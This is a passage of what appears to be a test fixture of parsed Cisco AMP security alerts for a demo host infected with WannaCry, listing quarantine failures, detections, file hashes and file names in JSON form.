"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17684, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526292", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18870, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526291", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 20056, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526288", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21242, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526287", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 22428, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526286", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 23614, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558988", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24800, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558989", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25986, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558987", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27172, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558986", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 28358, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558985", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29544, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 30737, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 327000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34828, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 313000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36357, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40152, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41272, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 42392, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 43512, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 44698, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + 